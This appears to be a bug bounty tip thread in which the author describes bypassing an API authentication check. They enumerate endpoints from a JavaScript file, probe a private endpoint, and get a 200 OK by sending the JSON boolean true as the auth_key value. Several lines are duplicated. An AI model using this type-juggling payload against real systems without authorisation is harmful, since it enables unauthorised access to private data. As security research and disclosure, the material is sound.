Recently bypassed an auth with a simple trick:
1. GET site.bruh/private => 405
(homepage was just showing "Working", opened page source, got a js file, grep all endpoints using linkfinder from js file)
2. POST site.bruh/private => 500 error: "Expected JSON body"
1. GET site.bruh/private => 405
(homepage was just showing "Working", opened page source, got a js file, grep all endpoints using linkfinder from js file)
2. POST site.bruh/private => 500 error: "Expected JSON body"
3. POST site.bruh/private
{} => 500 error: missing auth_key
4. POST site.bruh/private
{"auth_key":"123"} => 403
After many trials and errors (passing random values, special characters, adding commonly used tricks to bypass 403, like headers etc, nothing worked)
{} => 500 error: missing auth_key
4. POST site.bruh/private
{"auth_key":"123"} => 403
After many trials and errors (passing random values, special characters, adding commonly used tricks to bypass 403, like headers etc, nothing worked)
I was about to give up, but then i remembered a technique i used in a ctf few months ago:
POST site.bruh/private
{"auth_key":true}
200 OK
POST site.bruh/private
{"auth_key":true}
200 OK
And I was able to see the content of that private file, and could access almost every endpoint mentioned in that js file. (yeah did fuzzing too :)))
#bugbounty #bugbountytips #cybersecurity
#bugbounty #bugbountytips #cybersecurity
• • •
Missing some Tweet in this thread? You can try to
force a refresh
